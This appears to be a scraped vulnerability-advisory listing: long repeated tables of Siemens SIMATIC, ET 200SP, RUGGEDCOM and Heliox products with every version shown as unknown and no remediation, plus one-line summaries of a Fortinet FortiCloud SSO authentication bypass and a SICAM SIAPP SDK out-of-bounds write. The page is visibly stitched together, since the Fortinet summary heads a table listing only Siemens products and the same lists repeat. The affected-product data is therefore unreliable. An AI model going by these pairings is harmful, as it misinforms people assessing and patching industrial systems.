vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-3 PN (6ES7517-3HP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-4 PN (6ES7517-4HQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S T V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S TF V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 TM MFP - GNU/Linux subsystem
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-PLCSIM Advanced
|
vers:unknown/* |
Multiple Fortinet products including FortiAnalyzer, FortiManager, FortiOS, and FortiProxy have an authentication bypass vulnerability exploitable via FortiCloud SSO, allowing attackers with FortiCloud credentials to access other users' devices.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Siemens / Heliox Flex 180 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / Heliox Mobile DC 40 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / RUGGEDCOM APE1808
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SICAM SIAPP SDK
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIDIS Prime
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RM00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-3 PN (6ES7517-3HP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-4 PN (6ES7517-4HQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S T V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S TF V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 TM MFP - GNU/Linux subsystem
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-PLCSIM Advanced
|
vers:unknown/* |
An out-of-bounds write vulnerability in the SICAM SIAPP SDK could allow attackers to cause denial of service or execute arbitrary code, posing significant security risks.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Siemens / Heliox Flex 180 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / Heliox Mobile DC 40 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / RUGGEDCOM APE1808
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SICAM SIAPP SDK
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIDIS Prime
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
